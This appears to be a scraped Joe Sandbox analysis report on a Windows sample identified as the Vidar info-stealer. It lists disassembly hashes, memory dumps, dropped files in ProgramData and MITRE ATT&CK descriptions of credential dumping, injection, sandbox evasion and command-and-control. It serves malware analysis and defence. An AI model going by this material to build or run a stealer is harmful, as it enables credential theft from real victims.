Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: GetXStateFeaturesMask$InitializeCriticalSectionEx
API String ID: 0-4196971266
Opcode ID: 2b431b06a1e50ed0e2d4433f7b656427bcb0cb2c88c8a0dda5acefc1256d835d
Instruction ID: 51d5c307528f578e8f15d0f89e96deaf88d062d2d3b9a6ef14169378e165fe3c
Opcode Fuzzy Hash: 2b431b06a1e50ed0e2d4433f7b656427bcb0cb2c88c8a0dda5acefc1256d835d
Instruction Fuzzy Hash: AF01D4359801787BCF116A559C15DCA3E1AEBC0FA1F4D4021FE5C26250D6725879D6C0

Uniqueness

Uniqueness Score: -1.00%

Function 1984F740 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66COMMON

Download Yara Rule

Strings

DROP TABLE '%q'.'%q_node';DROP TABLE '%q'.'%q_rowid';DROP TABLE '%q'.'%q_parent';, xrefs: 1984F752

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: DROP TABLE '%q'.'%q_node';DROP TABLE '%q'.'%q_rowid';DROP TABLE '%q'.'%q_parent';
API String ID: 0-2071071404
Opcode ID: e733389c6866d0e8dbe93ce74215779028dc057d0c4acd3c7794ca1e2a140456
Instruction ID: 7c2bf0acdf019ea7fb8c59efcf4cc0e998f7d1a1a640fa51aeb4f550efefeef2
Opcode Fuzzy Hash: e733389c6866d0e8dbe93ce74215779028dc057d0c4acd3c7794ca1e2a140456
Instruction Fuzzy Hash: 0211E7B5600150AFE2005B3CDCCDF6733ACEF40645F19412DFD0AC3180E728B85AC662

Uniqueness

Uniqueness Score: -1.00%

Function 0040DC00 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040DC16

Part of subcall function 0041D040: std::exception::exception.LIBCMT ref: 0041D055
Part of subcall function 0041D040: __CxxThrowException@8.LIBCMT ref: 0041D06A
Part of subcall function 0041D040: std::exception::exception.LIBCMT ref: 0041D07B

memmove.MSVCRT ref: 0040DC4F

Strings

invalid string position, xrefs: 0040DC11

Memory Dump Source

Source File: 00000001.00000002.2106036038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.2106036038.0000000000431000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000435000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000513000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.0000000000516000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000051C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000055A000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.00000000005F4000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2106036038.000000000063C000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentmemmovestd::_
String ID: invalid string position
API String ID: 1659287814-1799206989
Opcode ID: bb872e9de1a3b33013f2610b99193ba1a90415cca5a6cbadb9b90b2bf8b44de4
Instruction ID: 3d509136ada29309dc7422f2d55f03f2458e4716739bc56107e598546c963ef4
Opcode Fuzzy Hash: bb872e9de1a3b33013f2610b99193ba1a90415cca5a6cbadb9b90b2bf8b44de4
Instruction Fuzzy Hash: 7E01B5717082104BE7248DA8D9C4827B7A6EBC6714720493EE481D7685DBF9EC4AC7AC

Uniqueness

Uniqueness Score: -1.00%

Function 19979C50 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52COMMON

Download Yara Rule

Strings

F, xrefs: 19979C86
YHI;, xrefs: 19979C53

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: F$YHI;
API String ID: 0-79577134
Opcode ID: c80ef3dcdb0c159442a3bdb7db8fca2a4673cb19ed67ad2d84e36393b4515d7f
Instruction ID: ca283b9e5ee49c5401d7bc8027ffe4bcbd2ffaaece6ba14b957444dfcc7c976e
Opcode Fuzzy Hash: c80ef3dcdb0c159442a3bdb7db8fca2a4673cb19ed67ad2d84e36393b4515d7f
Instruction Fuzzy Hash: 641158B59083869FD700CF29C440B1BBBE8AF94614F48891DF98997390E735E988CF93

Uniqueness

Uniqueness Score: -1.00%

Function 1982B224 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 11COMMON

Download Yara Rule

Strings

misuse, xrefs: 1982B233
%s at line %d of [%.10s], xrefs: 1982B238

Memory Dump Source

Source File: 00000001.00000002.2114638603.0000000019828000.00000020.00001000.00020000.00000000.sdmp, Offset: 19820000, based on PE: true

Associated: 00000001.00000002.2114617552.0000000019820000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019821000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019986000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2114638603.0000000019A2D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A2F000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115312661.0000000019A38000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115388733.0000000019A62000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6A000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6D000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.2115409196.0000000019A6F000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_19820000_RegAsm.jbxd

Similarity

API ID:
String ID: %s at line %d of [%.10s]$misuse
API String ID: 0-2530468415
Opcode ID: b8625a7db68342bff8a35cbcbf5d8e2c2d77521cee3ff44fe61fdf0be2640aa2
Instruction ID: 9970271ac0ddaca9733a29b8d438841eb4a6a1d765c3cd35d28bb9b6957c00c6
Opcode Fuzzy Hash: b8625a7db68342bff8a35cbcbf5d8e2c2d77521cee3ff44fe61fdf0be2640aa2
Instruction Fuzzy Hash: F3C02221184308E2C700DA68AC01CC927206FD0E00F9C8028A2280A0829220809C8282

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search the Registry on compromised systems for insecurely stored credentials. The Windows Registry stores configuration information that can be used by the system or other programs. Adversaries may query the Registry looking for credentials and passwords that have been stored for use by other programs or services. Sometimes these credentials are used for automatic logons.
Tactics:	Credential Access
Data Sources:	Command: Command Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for folders and drives shared on remote systems as a means of identifying sources of information to gather as a precursor for Collection and to identify potential systems of interest for Lateral Movement. Networks often contain shared network drives and folders that enable users to access file directories on various systems across a network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Vidar

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\BGCBGCAF

C:\ProgramData\BGHJJDGHCBGDHIECBGID

C:\ProgramData\BKJKJEHJ

C:\ProgramData\CAKKKJEHDBGIDHJKJDBFIIEBGC

C:\ProgramData\GIJDAFBK

C:\ProgramData\HIEBAKEHDHCAKEBFBKEG

C:\ProgramData\JDGCGHCG

C:\ProgramData\KFBFCAFCBKFI\freebl3.dll

C:\ProgramData\KFBFCAFCBKFI\mozglue.dll

C:\ProgramData\KFBFCAFCBKFI\msvcp140.dll

C:\ProgramData\KFBFCAFCBKFI\nss3.dll

Windows Analysis Report
file.exe

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre